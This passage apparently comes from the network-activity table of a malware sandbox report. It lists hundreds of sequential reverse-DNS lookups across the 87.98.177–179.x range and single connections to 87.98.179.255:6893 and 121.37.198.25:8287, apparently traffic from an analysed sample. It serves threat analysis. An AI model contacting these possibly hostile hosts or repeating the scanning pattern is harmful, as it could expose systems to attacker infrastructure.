| US | 8.8.8.8:53 | 76.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.177.98.87.in-addr.arpa | udp |
| FR | 87.98.179.255:6893 | udp | |
| US | 8.8.8.8:53 | 113.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.178.98.87.in-addr.arpa | udp |
| CN | 121.37.198.25:8287 | 121.37.198.25 | tcp |
| US | 8.8.8.8:53 | 46.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.179.98.87.in-addr.arpa | udp |
